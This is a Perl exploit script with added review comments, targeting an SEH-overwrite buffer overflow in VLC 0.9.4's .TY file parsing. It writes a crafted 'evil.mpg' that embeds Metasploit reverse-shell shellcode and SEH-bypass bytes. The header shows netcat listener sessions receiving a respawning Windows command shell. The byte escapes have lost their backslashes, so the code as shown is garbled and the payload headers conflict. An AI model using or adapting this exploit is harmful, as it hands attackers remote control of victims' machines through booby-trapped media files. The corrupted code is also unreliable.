# Title : VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)
# Published : 2008-10-23
# Author : Guido Landi
#!/usr/bin/perl
# 10/23/2008 k`sOSe
# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
# 2 - Works both with a local file and with a remote url
# 3 - VLC do not crash!
# 4 - Enjoy a respawing shell, even if VLC will be closed!
#
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>
use warnings;
use strict;

# --- Review notes ----------------------------------------------------------
# Purpose: this flat script writes a single crafted TiVo .TY container to
# "evil.mpg". The page title and the "pop,pop,ret" / "SEH will be triggered"
# comments below identify it as an SEH-overwrite proof of concept against the
# .TY handling in VLC 0.9.4.
# Defender view: the header constants written below (file id, chunk size,
# i_map_size, SEQ table size, record count and the two subrec/rec type pairs)
# are the values a detection rule for this family of files would key on; the
# mitigation is a VLC release that fixes this bug (version not stated on this
# page), plus not opening media files from untrusted sources.
#
# NOTE(review): every byte escape on this page reads "x41"/"xfc" rather than
# "\x41"/"\xfc" — the backslashes appear to have been lost in extraction. As
# written, Perl emits the three-character literal "x41", so all lengths,
# offsets and the `733 - length($shellcode)` padding differ from what the
# author intended. Left byte-identical here on purpose.
# NOTE(review): the two metasploit headers below disagree ("windows/exec -
# 141 bytes" vs "windows/shell_reverse_tcp - 287 bytes"); the second matches
# the LHOST/LPORT line and is presumably the payload that was actually used.
# The first header looks like a stale leftover.

# windows/exec - 141 bytes
# http://www.metasploit.com
my $shellcode =
# windows/shell_reverse_tcp - 287 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=443, LHOST=127.0.0.1
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24" .
"x8bx45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5f" .
"x20x01xebx49x8bx34x8bx01xeex31xc0x99xacx84" .
"xc0x74x07xc1xcax0dx01xc2xebxf4x3bx54x24x28" .
"x75xe5x8bx5fx24x01xebx66x8bx0cx4bx8bx5fx1c" .
"x01xebx03x2cx8bx89x6cx24x1cx61xc3x31xdbx64" .
"x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40x08x5e" .
"x68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" .
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50" .
"xffxd6x5fx89xe5x66x81xedx08x02x55x6ax02xff" .
"xd0x68xd9x09xf5xadx57xffxd6x53x53x53x53x43" .
"x53x43x53xffxd0x68x7fx00x00x01x66x68x01xbb" .
"x66x53x89xe1x95x68xecxf9xaax60x57xffxd6x6a" .
"x10x51x55xffxd0x66x6ax64x66x68x63x6dx6ax50" .
"x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95" .
"x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab" .
"x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51" .
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05" .
"xcex53xffxd6x6axffxffx37xffxd0x68xe7x79xc6" .
"x79xffx75x04xffxd6xffx77xfcxffxd0x68xf0x8a" .
"x04x5fx53xffxd6xffxd0";

# Filler byte repeated to pad every region of the file that is not a header
# field or a payload (see the "x41" escape note above).
my $junk = "x41";

# NOTE(review): two-argument, unchecked open. Prefer the three-argument form
# with an error check, e.g. `open my $file, '>', 'evil.mpg' or die "open: $!";`,
# and there is no `close $file or die` — a short write would go unnoticed.
# The output name is .mpg even though the content is a TiVo .TY container.
open(my $file, "> evil.mpg");

# The whole file is one concatenated print; the author's field names are
# kept on each line. Offsets are the author's and are not re-derived here.
print $file "xF5x46x7AxBD" . # TIVO_PES_FILEID (container magic)
"x00x00x00x02" .
"x00x02x00x00" . # CHUNK_SIZE
$junk x 8 .
"x00x00x05x41" . # i_map_size
$junk x 4 .
"x00x00x05x49" . # SEQ table size / (i_map_size + 8) == 1
$junk x 60 .
"xb3x57x04x7d" . # jmp esp for winxp sp2.. if it fails SEH will be triggered
$shellcode .      # payload is written twice in the original layout
$shellcode .
$junk x (733 - length($shellcode)) . # pad the record to a fixed 733 bytes (see escape note)
"xebx06x90x90" . # jump ahead (overwritten SEH handler slot, per the author)
"x13x12x54x6a" . # pop,pop,ret @ libvlc 0.9.4
"xe9x16xfdxffxff". # jump back
$junk x 129943 .  # filler up to the record header area
"x05" . # i_num_recs
$junk x 3 .
"x05" . # p_hdrs
$junk x 1 .
"x09" . # subrec_type
# (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
"xc0" . # rec_type /
$junk x 14 .
"x06" . # subrec_type
# (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
"xe0" . # rec_type /
$junk x 531062;   # trailing filler; file handle is never closed explicitly